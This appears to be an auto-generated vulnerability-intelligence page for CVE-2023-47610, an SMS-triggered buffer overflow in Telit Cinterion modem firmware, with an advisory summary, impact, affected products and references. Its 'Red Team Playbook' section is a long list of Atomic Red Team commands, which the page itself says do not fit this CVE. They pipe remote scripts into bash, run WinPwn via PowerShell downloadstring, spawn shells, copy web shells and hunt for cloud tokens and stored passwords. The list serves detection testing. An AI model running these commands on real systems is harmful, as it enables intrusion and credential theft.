CVE-2023-47610
Overview
This vulnerability is a buffer overflow caused by improper validation of input size during buffer copy operations within the Telit Cinterion EHS5/6/8 firmware. The flaw arises from a failure to check the length of incoming SMS message data before copying it into a fixed-size buffer. The affected component is the SMS processing module of the Telit Cinterion embedded cellular modules' firmware, which handles incoming message parsing.
Vulnerability Description
A CWE-120: Buffer Copy without Checking Size of Input vulnerability exists in Telit Cinterion EHS5/6/8 that could allow a remote unauthenticated attacker to execute arbitrary code on the targeted system by sending a specially crafted SMS message.
Impact
An unauthenticated remote attacker can exploit this vulnerability by sending a specially crafted SMS message to the affected Telit Cinterion modules, resulting in arbitrary code execution with the privileges of the SMS processing service. No prior authentication or user interaction is required (AV:N/AC:H/PR:N/UI:N). This can lead to full compromise of the device, enabling persistent control, data manipulation, or disruption of cellular communications in embedded systems relying on these modules.
Solution
Telit has released firmware updates addressing this buffer overflow vulnerability for the EHS5, EHS6, and EHS8 modules, as detailed in the Kaspersky ICS CERT advisory KL-CERT-23-018 (https://ics-cert.kaspersky.com/advisories/2023/11/08/klcert-23-018-telit-cinterion-thales-gemalto-modules-buffer-copy-without-checking-size-of-input-vulnerability/). Users should apply the latest firmware versions provided by Telit for the affected modules. No alternative mitigations or workarounds are specified in the advisory.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability exists within the Telit Cinterion EHS5/6/8 series, characterized by a buffer copy operation that lacks adequate size checks for input data. This flaw allows for the potential execution of arbitrary code on the targeted device when a specially crafted SMS message is sent. The underlying issue stems from improper handling of input sizes, which can lead to buffer overflows. When an attacker sends a maliciously crafted SMS, the device may attempt to process this input without verifying its length, resulting in memory corruption. This vulnerability is particularly concerning given the nature of the devices involved, which are often deployed in environments where they manage sensitive data or critical operations.
The primary attack vector for this vulnerability is through SMS messages, which are widely used for communication with IoT devices. An attacker, without requiring any form of authentication, can exploit this vulnerability remotely. By sending a specifically designed message that exceeds the expected input size, the attacker can manipulate the device's memory, potentially leading to the execution of arbitrary code. This could allow the attacker to take control of the device, alter its functionality, or even pivot to other connected systems within the network. The ease of exploitation, combined with the lack of authentication requirements, makes this vulnerability particularly dangerous.
The real-world impact of this vulnerability can be significant, especially for organizations that rely on these devices for critical operations. The ability to execute arbitrary code remotely can lead to unauthorized access to sensitive information, disruption of services, or even complete system compromise. For businesses, this translates into potential financial losses, reputational damage, and regulatory repercussions, particularly if sensitive data is exposed or if the devices are part of a larger critical infrastructure. The high CVSS score of 9.8 indicates the severity of the risk, emphasizing the need for immediate attention and remediation.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating firmware to the latest versions provided by the manufacturer is essential, as these updates often include patches for known vulnerabilities. Additionally, employing network monitoring tools can help identify unusual SMS traffic patterns that may indicate an attempted exploitation. Implementing strict access controls and segmenting networks can also reduce the risk of an attacker gaining a foothold within the system. Furthermore, organizations should consider employing intrusion detection systems that can analyze incoming messages for potential threats, thereby providing an additional layer of security.
In conclusion, the buffer copy vulnerability in the Telit Cinterion EHS5/6/8 series presents a serious threat to the security and integrity of affected devices. With the potential for remote code execution through a simple SMS message, the implications for businesses are profound. Organizations must prioritize the detection and mitigation of this vulnerability through proactive measures, including firmware updates, network monitoring, and robust access controls. By addressing this vulnerability, businesses can safeguard their operations and protect sensitive data from malicious actors.
Affected Products (10)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Telit | Bgs5 Firmware | N/A |
cpe:2.3:o:telit:bgs5_firmware:-:*:*:*:*:*:*:*
|
|
|
Telit | Ehs5 Firmware | N/A |
cpe:2.3:o:telit:ehs5_firmware:-:*:*:*:*:*:*:*
|
|
|
Telit | Ehs6 Firmware | N/A |
cpe:2.3:o:telit:ehs6_firmware:-:*:*:*:*:*:*:*
|
|
|
Telit | Ehs8 Firmware | N/A |
cpe:2.3:o:telit:ehs8_firmware:-:*:*:*:*:*:*:*
|
|
|
Telit | Pds5 Firmware | N/A |
cpe:2.3:o:telit:pds5_firmware:-:*:*:*:*:*:*:*
|
|
|
Telit | Pds6 Firmware | N/A |
cpe:2.3:o:telit:pds6_firmware:-:*:*:*:*:*:*:*
|
|
|
Telit | Pds8 Firmware | N/A |
cpe:2.3:o:telit:pds8_firmware:-:*:*:*:*:*:*:*
|
|
|
Telit | Els61 Firmware | N/A |
cpe:2.3:o:telit:els61_firmware:-:*:*:*:*:*:*:*
|
|
|
Telit | Els81 Firmware | N/A |
cpe:2.3:o:telit:els81_firmware:-:*:*:*:*:*:*:*
|
|
|
Telit | Pls62 Firmware | N/A |
cpe:2.3:o:telit:pls62_firmware:-:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-47610 |
| ics-cert.kaspersky.com |
GitHub CVE
third-party-advisory
|
https://ics-cert.kaspersky.com/advisories/2023/11/08/klcert-23-018-telit-cinterion-thales-gemalto-modules-buffer-copy-without-checking-size-of-input-vulnerability/ |